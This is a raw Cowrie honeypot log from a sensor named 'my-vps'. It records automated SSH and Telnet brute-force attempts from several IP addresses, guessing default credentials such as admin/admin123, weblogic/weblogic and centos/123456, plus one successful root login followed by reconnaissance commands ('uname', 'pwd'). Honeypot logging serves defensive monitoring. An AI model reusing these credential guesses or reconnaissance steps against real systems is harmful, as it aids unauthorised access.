{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:49:02.805665Z","src_ip":"212.227.235.229","session":"429deb27b502"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:03.070174Z","src_ip":"212.227.235.229","session":"429deb27b502"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:03.071232Z","src_ip":"212.227.235.229","session":"429deb27b502"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45692,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fce581a9e21","protocol":"ssh","message":"New connection: 212.227.125.160:45692 (1.2.3.4:22) [session: 0fce581a9e21]","sensor":"my-vps","timestamp":"2025-08-28T06:49:11.260022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:49:11.265311Z","src_ip":"212.227.125.160","session":"0fce581a9e21"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:49:11.482163Z","src_ip":"212.227.125.160","session":"0fce581a9e21"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:49:12.393039Z","src_ip":"212.227.125.160","session":"0fce581a9e21"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":43430,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ab70467dfcf","protocol":"telnet","message":"New connection: 8.222.212.69:43430 (1.2.3.4:23) [session: 7ab70467dfcf]","sensor":"my-vps","timestamp":"2025-08-28T06:49:12.656740Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:14.130057Z","src_ip":"212.227.125.160","session":"0fce581a9e21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33578,"dst_ip":"1.2.3.4","dst_port":22,"session":"84e7f11f0910","protocol":"ssh","message":"New connection: 212.227.235.229:33578 (1.2.3.4:22) [session: 84e7f11f0910]","sensor":"my-vps","timestamp":"2025-08-28T06:49:17.865432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:49:17.866421Z","src_ip":"212.227.235.229","session":"84e7f11f0910"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:49:18.118240Z","src_ip":"212.227.235.229","session":"84e7f11f0910"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:49:19.126346Z","src_ip":"212.227.235.229","session":"84e7f11f0910"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65028,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a231251e7af","protocol":"ssh","message":"New connection: 217.72.205.35:65028 (1.2.3.4:22) [session: 4a231251e7af]","sensor":"my-vps","timestamp":"2025-08-28T06:49:19.155535Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:19.156517Z","src_ip":"217.72.205.35","session":"4a231251e7af"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:20.380927Z","src_ip":"212.227.235.229","session":"84e7f11f0910"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58064,"dst_ip":"1.2.3.4","dst_port":22,"session":"f824588e87bb","protocol":"ssh","message":"New connection: 212.227.125.160:58064 (1.2.3.4:22) [session: f824588e87bb]","sensor":"my-vps","timestamp":"2025-08-28T06:49:27.496568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:49:27.535819Z","src_ip":"212.227.125.160","session":"f824588e87bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:49:27.718970Z","src_ip":"212.227.125.160","session":"f824588e87bb"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-28T06:49:28.593006Z","src_ip":"212.227.125.160","session":"f824588e87bb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:29.814572Z","src_ip":"212.227.125.160","session":"f824588e87bb"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":59541,"dst_ip":"1.2.3.4","dst_port":22,"session":"e206ee16b7d0","protocol":"ssh","message":"New connection: 186.225.142.90:59541 (1.2.3.4:22) [session: e206ee16b7d0]","sensor":"my-vps","timestamp":"2025-08-28T06:49:32.568786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:49:33.029672Z","src_ip":"186.225.142.90","session":"e206ee16b7d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:49:33.030365Z","src_ip":"186.225.142.90","session":"e206ee16b7d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43832,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8e7504218cf","protocol":"ssh","message":"New connection: 212.227.235.229:43832 (1.2.3.4:22) [session: c8e7504218cf]","sensor":"my-vps","timestamp":"2025-08-28T06:49:34.088395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:49:34.089081Z","src_ip":"212.227.235.229","session":"c8e7504218cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:49:34.339453Z","src_ip":"212.227.235.229","session":"c8e7504218cf"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-28T06:49:35.092740Z","src_ip":"212.227.235.229","session":"c8e7504218cf"}
{"eventid":"cowrie.login.success","username":"root","password":"0899400729%9","message":"login attempt [root/0899400729%9] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:49:35.359999Z","src_ip":"186.225.142.90","session":"e206ee16b7d0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:36.369894Z","src_ip":"212.227.235.229","session":"c8e7504218cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:49:36.949465Z","src_ip":"186.225.142.90","session":"e206ee16b7d0"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T06:49:36.950364Z","src_ip":"186.225.142.90","session":"e206ee16b7d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:37.590636Z","src_ip":"186.225.142.90","session":"e206ee16b7d0"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:38.084763Z","src_ip":"186.225.142.90","session":"e206ee16b7d0"}
{"eventid":"cowrie.session.closed","duration":30.763198614120483,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:43.419859Z","src_ip":"8.222.212.69","session":"7ab70467dfcf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33646,"dst_ip":"1.2.3.4","dst_port":22,"session":"61a399c7e9b6","protocol":"ssh","message":"New connection: 212.227.125.160:33646 (1.2.3.4:22) [session: 61a399c7e9b6]","sensor":"my-vps","timestamp":"2025-08-28T06:49:43.862436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:49:43.863466Z","src_ip":"212.227.125.160","session":"61a399c7e9b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:49:44.081212Z","src_ip":"212.227.125.160","session":"61a399c7e9b6"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:49:44.737009Z","src_ip":"212.227.125.160","session":"61a399c7e9b6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:45.957751Z","src_ip":"212.227.125.160","session":"61a399c7e9b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47190,"dst_ip":"1.2.3.4","dst_port":22,"session":"03768b5aea08","protocol":"ssh","message":"New connection: 212.227.235.229:47190 (1.2.3.4:22) [session: 03768b5aea08]","sensor":"my-vps","timestamp":"2025-08-28T06:49:50.390111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:49:50.391047Z","src_ip":"212.227.235.229","session":"03768b5aea08"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:49:50.637858Z","src_ip":"212.227.235.229","session":"03768b5aea08"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:49:51.381560Z","src_ip":"212.227.235.229","session":"03768b5aea08"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:49:52.631367Z","src_ip":"212.227.235.229","session":"03768b5aea08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36394,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbce158be17c","protocol":"ssh","message":"New connection: 212.227.125.160:36394 (1.2.3.4:22) [session: dbce158be17c]","sensor":"my-vps","timestamp":"2025-08-28T06:50:00.295571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:50:00.296493Z","src_ip":"212.227.125.160","session":"dbce158be17c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:50:00.512989Z","src_ip":"212.227.125.160","session":"dbce158be17c"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-28T06:50:01.161486Z","src_ip":"212.227.125.160","session":"dbce158be17c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:02.380005Z","src_ip":"212.227.125.160","session":"dbce158be17c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56622,"dst_ip":"1.2.3.4","dst_port":22,"session":"b05fc2ef3318","protocol":"ssh","message":"New connection: 212.227.235.229:56622 (1.2.3.4:22) [session: b05fc2ef3318]","sensor":"my-vps","timestamp":"2025-08-28T06:50:06.930785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:50:06.931679Z","src_ip":"212.227.235.229","session":"b05fc2ef3318"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:50:07.188000Z","src_ip":"212.227.235.229","session":"b05fc2ef3318"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-28T06:50:07.955821Z","src_ip":"212.227.235.229","session":"b05fc2ef3318"}
